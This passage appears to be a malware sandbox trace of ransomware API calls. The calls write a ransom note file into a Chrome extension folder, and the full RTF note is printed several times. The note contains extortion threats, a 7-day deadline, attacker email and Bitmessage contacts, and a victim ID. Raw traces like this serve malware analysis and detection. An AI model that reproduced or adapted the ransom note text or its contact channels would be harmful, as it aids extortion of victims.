br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.755] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.755] CloseHandle (hObject=0x294) returned 1 [0297.756] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0297.756] GetLastError () returned 0x2 [0297.756] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n 